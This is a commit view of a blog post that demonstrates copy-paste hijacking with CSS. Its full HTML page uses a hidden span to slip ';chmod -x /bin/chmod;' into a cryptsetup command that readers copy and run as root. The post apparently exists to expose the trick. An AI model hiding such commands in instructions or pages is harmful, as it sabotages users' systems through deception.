GitList
Browse code

New article: Dangerous CSS

Cinan Rakosnik authored on 25/01/2014 at 22:46:29
Showing 1 changed files
source/_posts/2014-01-25-dangerous-css-how-to-unnoticeably-destroy-star-nix-system.markdown
History View file @ 9631d34
1 1 
new file mode 100644
... ... 
@@ -0,0 +1,111 @@
0 
+---
1 
+layout: post
2 
+title: "Dangerous CSS: how to unnoticeably destroy *nix system"
3 
+date: 2014-01-25 23:16
4 
+comments: true
5 
+categories: []
6 
+cover: /images/cover/avatar.png
7 
+keywords:
8 
+description:
9 
+---
10 
+
11 
+Let's do bad things. I've got an idea -- provide a nice looking
12 
+Linux command on a blog/wiki. Yep, that's almost all.
13 
+
14 
+Imagine you're setting up dm-crypt encryption. You'll find a guide
15 
+with commands ready to copy & paste into your terminal.
16 
+Almost all commands have to be run as root, that's good for me.
17 
+Something like this:
18 
+
19 
+{% codeblock lang:bash %}
20 
+cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash sha512 --iter-time 5000 --use-urandom --verify-passphrase luksFormat <device>
21 
+{% endcodeblock %}
22 
+
23 
+Oh, almighty CSS, now it's your turn. Go to [this page](http://cinan.sk/pub/dangerous-css.html)
24 
+and copy the command. I added some javascript stuff to make text selecting
25 
+easier -- **javascript isn't required**. Now paste the copied text
26 
+somewhere. As you can see, there's bonus command (```chmod -x /bin/chmod```). Nice, isn't it?
27 
+
28 
+Code, obviously:
29 
+{% codeblock lang:html %}
30 
+<html>
31 
+<head>
32 
+	<script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
33 
+	<script src="http://code.jquery.com/jquery-migrate-1.2.1.js"></script>
34 
+	<script>
35 
+		// Makes selecting text easier
36 
+		jQuery.fn.selText = function() {
37 
+			var obj = this[0];
38 
+			if (jQuery.browser.msie) {
39 
+				var range = obj.offsetParent.createTextRange();
40 
+				range.moveToElementText(obj);
41 
+				range.select();
42 
+			} else if (jQuery.browser.mozilla || jQuery.browser.opera) {
43 
+				var selection = obj.ownerDocument.defaultView.getSelection();
44 
+				var range = obj.ownerDocument.createRange();
45 
+				range.selectNodeContents(obj);
46 
+				selection.removeAllRanges();
47 
+				selection.addRange(range);
48 
+			} else if (jQuery.browser.webkit) {
49 
+				var selection = obj.ownerDocument.defaultView.getSelection();
50 
+				selection.setBaseAndExtent(obj, 0, obj, obj.innerText.length - 1);
51 
+			}
52 
+			return this;
53 
+		}
54 
+
55 
+		$(document).ready(function() {
56 
+			$('pre').click(function(e) {
57 
+				e.preventDefault();
58 
+				$(this).selText();
59 
+			})
60 
+		});
61 
+	</script>
62 
+	<style>
63 
+		*::selection {
64 
+			background: rgb(95, 196, 243);
65 
+		}
66 
+
67 
+		/* INTERESTING PART */
68 
+		span {
69 
+			width: 1px; /* can't be 0px */
70 
+			white-space: nowrap;
71 
+			display: inline-block;
72 
+			overflow: hidden; /* text hiding */
73 
+			color: transparent; /* text hiding */
74 
+			vertical-align: middle;
75 
+			position: absolute;
76 
+		}
77 
+
78 
+		pre {
79 
+			display: inline-block;
80 
+			white-space: nowrap;
81 
+			overflow: hidden;
82 
+			border: 1px solid #bcd;
83 
+			background-color: #ebf1f5;
84 
+			color: #222;
85 
+			font-family: monospace;
86 
+			line-height: 1.1em;
87 
+			padding: 1em;
88 
+		}
89 
+
90 
+		pre:first-of-type {
91 
+			border-right: 0;
92 
+			padding-right: 0;
93 
+		}
94 
+
95 
+		pre:last-of-type {
96 
+			border-left: 0;
97 
+			padding-left: 2ex;
98 
+		}
99 
+	</style>
100 
+<body>
101 
+	<pre>#</pre><pre>cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash
102 
+		sha512 --iter-time 500<span>;chmod -x /bin/chmod; </span>0 --use-urandom --verify-passphrase luksFormat &lt;device&gt;
103 
+	</pre>
104 
+</body>
105 
+</html>
106 
+{% endcodeblock %}
107 
+
108 
+What's happening here: I'm selecting ```pre``` content which also contains another
109 
+```span``` element.
110 
+Tested on Chromium, Firefox, Opera and Safari.
0 111 
\ No newline at end of file